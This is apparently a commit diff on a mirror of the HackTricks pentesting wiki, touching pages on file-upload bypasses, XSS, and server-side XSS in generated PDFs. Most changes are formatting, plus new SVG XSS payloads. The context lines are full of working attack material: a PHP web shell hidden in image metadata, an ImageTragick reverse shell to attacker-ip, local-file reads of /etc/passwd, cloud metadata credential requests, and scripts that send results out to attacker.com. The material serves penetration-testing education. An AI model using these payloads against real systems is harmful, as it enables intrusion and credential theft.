0x22bb
/
hacktricks
mirror of https://github.com/carlospolop/hacktricks.git
1
2
Fork 0
Code Releases Activity

GitBook: [#3154] No subject

This commit is contained in:
CPol 2022-04-30 10:09:20 +00:00 committed by gitbook-bot
parent 5a4f9d6a67
commit d95209236f
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
3 changed files with 64 additions and 58 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

60
pentesting-web/file-upload/README.md
View File

@ -1,4 +1,4 @@
# File Upload
<details>
@ -16,25 +16,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
## File Upload
# File Upload
{% hint style="warning" %}
**Support HackTricks and get benefits!**
Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**?
Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
{% endhint %}
## File Upload General Methodology
### File Upload General Methodology
Other useful extensions:
@ -46,7 +30,7 @@ Other useful extensions:
* **Perl**: _.pl, .cgi_
* **Erlang Yaws Web Server**: _.yaws_
### Bypass file extensions checks
#### Bypass file extensions checks
1. If they apply, the **check** the **previous extensions.** Also test them using some **uppercase letters**: _pHp, .pHP5, .PhAr ..._
2. _Check **adding a valid extension before** the execution extension (use previous extensions also):_
@ -73,7 +57,7 @@ Other useful extensions:
5. Add **another layer of extensions** to the previous check:
* _file.png.jpg.php_
* _file.php%00.png%00.jpg_
6. Try to put the **exec extension before the valid extension** and pray so the server is misconfigured. (useful to exploit Apache misconfigurations where anything with extension** _**.php**_**, but** not necessarily ending in .php** will execute code):
6. Try to put the **exec extension before the valid extension** and pray so the server is misconfigured. (useful to exploit Apache misconfigurations where anything with extension\*\* _**.php**_**, but** not necessarily ending in .php\*\* will execute code):
* _ex: file.php.png_
7. Using **NTFS alternate data stream (ADS)** in **Windows**. In this case, a colon character “:” will be inserted after a forbidden extension and before a permitted one. As a result, an **empty file with the forbidden extension** will be created on the server (e.g. “file.asax:.jpg”). This file might be edited later using other techniques such as using its short filename. The “**::$data**” pattern can also be used to create non-empty files. Therefore, adding a dot character after this pattern might also be useful to bypass further restrictions (.e.g. “file.asp::$data.”)
8. Try to break the filename limits. The valid extension gets cut off. And the malicious PHP gets left. AAA<--SNIP-->AAA.php
@ -89,14 +73,14 @@ Other useful extensions:
AAA<--SNIP 232 A-->AAA.php.png
```
### Bypass Content-Type & magic number
#### Bypass Content-Type & magic number
1. Bypass Content-Type checks by setting the **value** of the **Content-Type** **header** to: _image/png_ , _text/plain , application/octet-stream_
1. Content-Type **wordlist**: [https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/web/content-type.txt](https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/web/content-type.txt)
2. Bypass magic number check by adding at the beginning of the file the **bytes of a real image** (confuse the _file_ command). Or introduce the shell inside the **metadata**: `exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg`
1. It is also possible that the **magic bytes** are just being **checked** in the file and you could set them **anywhere in the file**.
### Other Tricks to check
#### Other Tricks to check
* Find a vulnerability to **rename** the file already uploaded (to change the extension).
* Find a **Local File Inclusion** vulnerability to execute the backdoor.
@ -109,7 +93,7 @@ Other useful extensions:
6. Upload a file in **Windows** using **reserved** (**forbidden**) **names** such as CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, and LPT9.
* Try also to **upload an executable** (.exe) or an **.html** (less suspicious) that **will execute code** when accidentally opened by victim.
### Special extension tricks
#### Special extension tricks
If you are trying to upload files to a **PHP server**, [take a look at the **.htaccess** trick to execute code](https://book.hacktricks.xyz/pentesting/pentesting-web/php-tricks-esp#code-execution-via-httaccess).\
If you are trying to upload files to an **ASP server**, [take a look at the **.config** trick to execute code](../../pentesting/pentesting-web/iis-internet-information-services.md#execute-config-files).
@ -118,7 +102,7 @@ The `.phar` files are like the `.jar` for java, but for php, and can be **used l
The `.inc` extension is sometimes used for php files that are only used to **import files**, so, at some point, someone could have allow **this extension to be executed**.
### **wget File Upload/SSRF Trick**
#### **wget File Upload/SSRF Trick**
In some occasions you may find that a server is using **`wget`** to **download files** and you can **indicate** the **URL**. In these cases, the code may be checking that the extension of the downloaded files is inside a whitelist to assure that only allowed files are going to be downloaded. However, **this check can be bypassed.**\
The **maximum** length of a **filename** in **linux** is **255**, however, **wget** truncate the filenames to **236** characters. You can **download a file called "A"\*232+".php"+".gif"**, this filename will **bypass** the **check** (as in this example **".gif"** is a **valid** extension) but `wget` will **rename** the file to **"A"\*232+".php"**.
@ -148,13 +132,13 @@ AAAAAAAAAAAAAAAAAAAAAAAAAAAAA 100%[=============================================
Note that **another option** you may be thinking of to bypass this check is to make the **HTTP server redirect to a different file**, so the initial URL will bypass the check by then wget will download the redirected file with the new name. This **won't work** **unless** wget is being used with the **parameter** `--trust-server-names` because **wget will download the redirected page with the name of the file indicated in the original URL**.
### Other resources
#### Other resources
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20insecure%20files](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20insecure%20files)
* [https://github.com/modzero/mod0BurpUploadScanner](https://github.com/modzero/mod0BurpUploadScanner)
* [https://github.com/almandin/fuxploider](https://github.com/almandin/fuxploider)
## From File upload to other vulnerabilities
### From File upload to other vulnerabilities
* Set **filename** to `../../../tmp/lol.png` and try to achieve a **path traversal**
* Set **filename** to `sleep(10)-- -.jpg` and you may be able to achieve a **SQL injection**
@ -164,11 +148,12 @@ Note that **another option** you may be thinking of to bypass this check is to m
* **JS** file **upload** + **XSS** = [**Service Workers** exploitation](../xss-cross-site-scripting/#xss-abusing-service-workers)
* [**XXE in svg upload**](../xxe-xee-xml-external-entity.md#svg-file-upload)
* [**Open Redirect** via uploading svg file](../open-redirect.md#open-redirect-uploading-svg-files)
* Try **different svg payloads** from [**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet)****
* [Famous **ImageTrick** vulnerability](https://mukarramkhalid.com/imagemagick-imagetragick-exploit/)
* If you can **indicate the web server to catch an image from a URL** you could try to abuse a [SSRF](../ssrf-server-side-request-forgery/). If this **image** is going to be **saved** in some **public** site, you could also indicate a URL from [https://iplogger.org/invisible/](https://iplogger.org/invisible/) and **steal information of every visitor**.
* [**XXE and CORS** bypass with PDF-Adobe upload](pdf-upload-xxe-and-cors-bypass.md)
* Specially crafted PDFs to XSS: The [following page present how to **inject PDF data to obtain JS execution**](../xss-cross-site-scripting/pdf-injection.md). If you can upload PDFs you could prepare some PDF that will execute arbitrary JS following the given indications.
* Upload the \[eicar]\(**[https://secure.eicar.org/eicar.com.txt](https://secure.eicar.org/eicar.com.txt)**) content to check if the server has any** antivirus**
* Upload the \[eicar]\([**https://secure.eicar.org/eicar.com.txt**](https://secure.eicar.org/eicar.com.txt)) content to check if the server has any **antivirus**
* Check if there is any **size limit** uploading files
Heres a top 10 list of things that you can achieve by uploading (from [link](https://twitter.com/SalahHasoneh1/status/1281274120395685889)):
@ -184,22 +169,22 @@ Heres a top 10 list of things that you can achieve by uploading (from [link](
9. **ZIP**: RCE via LFI / DoS
10. **PDF / PPTX**: SSRF / BLIND XXE
### Burp Extension
#### Burp Extension
{% embed url="https://github.com/portswigger/upload-scanner" %}
## Magic Header Bytes
### Magic Header Bytes
* **PNG**: `"\x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\xs0\x03["`
* **JPG**: `"\xff\xd8\xff"`
Refer to [https://en.wikipedia.org/wiki/List\_of\_file\_signatures](https://en.wikipedia.org/wiki/List\_of\_file\_signatures) for other filetypes.
## Zip/Tar File Automatically decompressed Upload
### Zip/Tar File Automatically decompressed Upload
If you can upload a ZIP that is going to be decompressed inside the server, you can do 2 things:
### Symlink
#### Symlink
Upload a link containing soft links to other files, then, accessing the decompressed files you will access the linked files:
@ -209,7 +194,7 @@ zip --symlinks test.zip symindex.txt
tar -cvf test.tar symindex.txt
```
### Decompress in different folders
#### Decompress in different folders
The decompressed files will be created in unexpected folders.
@ -292,7 +277,7 @@ Only one step remained: Upload the ZIP file and let the application decompress i
**Reference**: [https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/](https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/)
## ImageTragic
### ImageTragic
Upload this content with an image extension to exploit the vulnerability **(ImageMagick , 7.0.1-1)**
@ -303,13 +288,13 @@ fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-p
pop graphic-context
```
## Embedding PHP Shell on PNG
### Embedding PHP Shell on PNG
The primary reason putting a web shell in the IDAT chunk is that it has the ability to bypass resize and re-sampling operations - PHP-GD contains two functions to do this [imagecopyresized](http://php.net/manual/en/function.imagecopyresized.php) and [imagecopyresampled](http://php.net/manual/en/function.imagecopyresampled.php).
Read this post: [https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)
## Polyglot Files
### Polyglot Files
Polyglots, in a security context, are files that are a valid form of multiple different file types. For example, a [GIFAR](https://en.wikipedia.org/wiki/Gifar) is both a GIF and a RAR file. There are also files out there that can be both GIF and JS, both PPT and JS, etc.
@ -319,7 +304,6 @@ This helps to upload a file that complins with the format of several different f
More information in: [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a)
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
@ -335,5 +319,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details>

15
pentesting-web/xss-cross-site-scripting/README.md
View File

@ -1070,6 +1070,21 @@ alert("XSS");
</svg>
```
```svg
<svg width="500" height="500"
xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<circle cx="50" cy="50" r="45" fill="green"
id="foo"/>
<foreignObject width="500" height="500">
<iframe xmlns="http://www.w3.org/1999/xhtml" src="data:text/html,&lt;body&gt;&lt;script&gt;document.body.style.background=&quot;red&quot;&lt;/script&gt;hi&lt;/body&gt;" width="400" height="250"/>
<iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:document.write('hi');" width="400" height="250"/>
</foreignObject>
</svg>ht
```
Find m**ore SVG payloads in** [**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet)****
### XSS resources
[https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20injection)\

47
pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md
View File

@ -1,4 +1,4 @@
# Server Side XSS (Dynamic PDF)
<details>
@ -16,20 +16,19 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
# Server Side XSS (Dynamic PDF)
## Server Side XSS (Dynamic PDF)
### Server Side XSS (Dynamic PDF)
If a web page is creating a PDF using user controlled input, you can try to **trick the bot** that is creating the PDF into **executing arbitrary JS code**.\
So, if the **PDF creator bot finds** some kind of **HTML** **tags**, it is going to **interpret** them, and you can **abuse** this behaviour to cause a **Server XSS**.
Please, notice that the `<script><\script>` tags don't work always, so you will need a different method to execute JS (for example, abusing `<img` ).\
Also, note that in a regular exploitation you will be **able to see/download the created pdf**, so you will be able to see everything you **write via JS** (using `document.write()` for example). But, if you **cannot see** the created PDF, you will probably need **extract the information making web request to you** (Blind).
## Payloads
### Payloads
### Discovery
#### Discovery
```markup
<!-- Basic discovery, Write somthing-->
@ -44,7 +43,7 @@ Also, note that in a regular exploitation you will be **able to see/download the
<link rel=attachment href="http://attacker.com">
```
### SVG
#### SVG
Any of the previous of following payloads may be used inside this SVG payload. One iframe accessing Burpcollab subdomain and another one accessing the metadata endpoint are put as examples.
@ -59,9 +58,23 @@ Any of the previous of following payloads may be used inside this SVG payload. O
</foreignObject>
</g>
</svg>
<svg width="100%" height="100%" viewBox="0 0 100 100"
xmlns="http://www.w3.org/2000/svg">
<circle cx="50" cy="50" r="45" fill="green"
id="foo"/>
<script type="text/javascript">
// <![CDATA[
alert(1);
// ]]>
</script>
</svg>
```
### Path disclosure
You can find a lot **other SVG payloads** in [**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet)****
#### Path disclosure
```markup
<!-- If the bot is accessing a file:// path, you will discover the internal path
@ -70,7 +83,7 @@ if not, you will at least have wich path the bot is accessing -->
<script> document.write(window.location) </script>
```
### Load an external script
#### Load an external script
The best conformable way to exploit this vulnerability is to abuse the vulnerability to make the bot load a script you control locally. Then, you will be able to change the payload locally and make the bot load it with the same code every time.
@ -79,7 +92,7 @@ The best conformable way to exploit this vulnerability is to abuse the vulnerabi
<img src="xasdasdasd" onerror="document.write('<script src="https://attacker.com/test.js"></script>')"/>
```
### Read local file
#### Read local file
```markup
<script>
@ -107,13 +120,13 @@ x.open("GET","file:///etc/passwd");x.send();
<portal src="file:///etc/passwd" id=portal>
```
### Get external web page response as attachment (metadata endpoints)
#### Get external web page response as attachment (metadata endpoints)
```markup
<link rel=attachment href="http://http://169.254.169.254/latest/meta-data/iam/security-credentials/">
```
### Bot delay
#### Bot delay
```markup
<!--Make the bot send a ping every 500ms to check how long does the bot wait-->
@ -128,7 +141,7 @@ x.open("GET","file:///etc/passwd");x.send();
<img src="https://attacker.com/delay">
```
### Port Scan
#### Port Scan
```markup
<!--Scan local port and receive a ping indicating which ones are found-->
@ -147,11 +160,11 @@ for(let i=0; i<1000; i++) {
<img src="https://attacker.com/startingScan">
```
### [SSRF](../ssrf-server-side-request-forgery/)
#### [SSRF](../ssrf-server-side-request-forgery/)
This vulnerability can be transformed very easily in a SSRF (as you can make the script load external resources). So just try to exploit it (read some metadata?).
## References
### References
{% embed url="https://lbherrera.github.io/lab/h1415-ctf-writeup.html" %}
@ -159,8 +172,6 @@ This vulnerability can be transformed very easily in a SSRF (as you can make the
{% embed url="https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html" %}
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
@ -176,5 +187,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details>